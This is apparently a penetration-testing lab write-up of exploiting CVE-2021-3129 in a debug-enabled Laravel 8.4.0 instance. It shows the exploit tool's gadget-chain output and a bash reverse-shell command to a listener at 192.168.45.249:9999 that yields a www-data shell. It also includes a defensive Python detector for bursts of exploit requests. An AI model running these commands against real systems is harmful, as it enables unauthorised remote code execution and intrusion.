CVE-2021-3129
The target Laravel instance appears to be vulnerable to CVE-2021-3129 because of its outdated version and debug mode being enabled.
Laravel Log Path
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129]
└─$ python3 CVE-2021-3129.py --host http://192.168.201.38/
_____ _____ ___ __ ___ _ _____ ___ ___
/ __\ \ / / __|_|_ ) \_ ) |__|__ / |_ ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /_, /
\___| \_/ |___| /___\__/___|_| |___/_/___|/_/
https://github.com/joshuavanderpoll/CVE-2021-3129
Using PHPGGC: https://github.com/ambionics/phpggc
[@] Starting the exploit on "http://192.168.201.38/"...
[@] Testing vulnerable URL "http://192.168.201.38/_ignition/execute-solution"...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Linux based machine.
[√] Laravel log path: "/var/www/html/lavita/storage/logs/laravel.log".
[•] Laravel version found: "8.4.0".
[•] Use "?" for a list of all available actions.
[?] Please enter a command to execute :
Executing the exploit automatically finds the Laravel log path: /var/www/html/lavita/storage/logs/laravel.log
Commands
[?] Please enter a command to execute : ?
[•] Available commands
exit - Exit program..
help - Show available commands..
clear_logs - Clear Laravel logs..
execute <command> - Execute system command..
write <text> - Write to log file..
patch <env/index/private> - Patch the vulnerability..
patches - Detailed information about patch modes.
There are several commands available within the exploit. I'll go with the execute command.
PHPGGC
[?] Please enter a command to execute : execute id
[@] Executing command "id"...
[@] Generating payload...
[!] Required binary PHPGGC not found.
[@] Downloading PHPGGC from "ambionics/phpggc" GitHub repository...
[√] Downloaded/extracted PHPGGC.
[@] Updating PHPGGC execution permissions...
[√] Updated PHPGGC execution permissions.
PHP Deprecated: Creation of dynamic property Illuminate\Validation\Rules\RequiredIf::$condition is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/8/gadgets.php on line 22
PHP Deprecated: Creation of dynamic property Illuminate\Broadcasting\BroadcastEvent::$connection is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/9/gadgets.php on line 46
ERROR: Phar requires either a __destruct or a __wakeup vector
PHP Deprecated: Creation of dynamic property Illuminate\Broadcasting\PendingBroadcast::$event is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/11/gadgets.php on line 22
PHP Deprecated: Creation of dynamic property Illuminate\Broadcasting\PendingBroadcast::$events is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/11/gadgets.php on line 23
PHP Deprecated: Creation of dynamic property Monolog\LogRecord::$mixed is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Monolog/RCE/8/gadgets.php on line 18
PHP Deprecated: Creation of dynamic property Monolog\LogRecord::$mixed is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Monolog/RCE/9/gadgets.php on line 35
[√] Generated 21 payloads.
[@] Trying chain laravel/rce1 [1/21]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Output :
[√] Working chain found. You have now access to the 'patch' functionality.
[?] Would you like to try the next chain? [Y/N] :
Executing a system command automatically downloads the PHPGGC tool and generates all 21 available payloads. The first payload, laravel/rce1, appears to have failed, as it does not show any output.
[?] Would you like to try the next chain? [Y/N] : Y
[@] Trying chain laravel/rce2 [2/21]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Output :
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[?] Would you like to try the next chain? [Y/N] : N
Moving on to the next payload, laravel/rce2 succeeded, so I will stick with the second gadget chain.
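Each gadget-chain attempt above is several POSTs to /_ignition/execute-solution from one client in quick succession (clear logs, cause an error, send payload, convert payload). As an added example that is not part of this write-up or of the exploit tool, the Python script below flags such bursts in a combined-format web access log; the sample log lines, client IPs and timestamps are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined log format (Apache/nginx default): ip - - [time] "METHOD path HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
IGNITION_PATH = "/_ignition/execute-solution"  # endpoint exercised by CVE-2021-3129 tooling

def parse_line(line):
    """Return a dict with ip/ts/method/path/status, or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return d

def find_ignition_bursts(lines, window_seconds=60, min_posts=3):
    """Group POSTs to the Ignition solution endpoint by client IP and report
    clients that issued at least `min_posts` of them within `window_seconds`.
    A legitimate developer clicks a solution once; the exploit needs several
    POSTs per chain, so a cluster from one client is a strong signal."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith(IGNITION_PATH):
            hits[rec["ip"]].append(rec["ts"])
    findings = {}
    for ip, stamps in hits.items():
        stamps.sort()
        best, start = 0, 0  # sliding window: largest cluster inside window_seconds
        for end in range(len(stamps)):
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_posts:
            findings[ip] = {"posts": len(stamps), "max_in_window": best,
                            "first": stamps[0].isoformat(), "last": stamps[-1].isoformat()}
    return findings

# Constructed sample lines (not taken from the page's target); timestamps are illustrative.
SAMPLE_LOG = """\
10.0.0.7 - - [10/Mar/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:05 +0000] "GET /_ignition/execute-solution HTTP/1.1" 405 0 "-" "python-requests/2.31"
10.0.0.9 - - [10/Mar/2024:12:00:06 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "python-requests/2.31"
10.0.0.9 - - [10/Mar/2024:12:00:06 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 0 "-" "python-requests/2.31"
10.0.0.9 - - [10/Mar/2024:12:00:07 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "python-requests/2.31"
10.0.0.9 - - [10/Mar/2024:12:00:08 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 0 "-" "python-requests/2.31"
10.0.0.7 - - [10/Mar/2024:12:00:09 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
garbage line that does not parse
"""

if __name__ == "__main__":
    for ip, info in find_ignition_bursts(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

Any hit on this endpoint from a production host is worth a look, since Ignition's solution runner only responds when APP_DEBUG is on; the burst threshold just separates the exploit pattern from a single accidental click.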
Exploitation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129]
└─$ python3 CVE-2021-3129.py --host http://192.168.201.38/ --chain laravel/rce2 --exec 'bash -c "bash -i >& /dev/tcp/192.168.45.249/9999 0>&1"'
_____ _____ ___ __ ___ _ _____ ___ ___
/ __\ \ / / __|_|_ ) \_ ) |__|__ / |_ ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /_, /
\___| \_/ |___| /___\__/___|_| |___/_/___|/_/
https://github.com/joshuavanderpoll/CVE-2021-3129
Using PHPGGC: https://github.com/ambionics/phpggc
[@] Starting the exploit on "http://192.168.201.38/"...
[@] Testing vulnerable URL "http://192.168.201.38/_ignition/execute-solution"...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Linux based machine.
[√] Laravel log path: "/var/www/html/lavita/storage/logs/laravel.log".
[•] Laravel version found: "8.4.0".
[@] Clearing Laravel logs...
[√] Cleared Laravel logs!
[@] Executing command "bash -c "bash -i >& /dev/tcp/192.168.45.249/9999 0>&1""...
[@] Generating payload...
[√] Generated 1 payloads.
[@] Trying chain laravel/rce2 [1/1]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
Executing the exploit script with a reverse shell payload.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.201.38] 37766
bash: cannot set terminal process group (605): Inappropriate ioctl for device
bash: no job control in this shell
www-data@debian:/$ whoami
whoami
www-data
www-data@debian:/$ hostname
hostname
debian
www-data@debian:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:2c:5d brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.201.38/24 brd 192.168.201.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe9e:2c5d/64 scope link
valid_lft forever preferred_lft forever
Initial foothold established on the target system as the www-data account by exploiting CVE-2021-3129.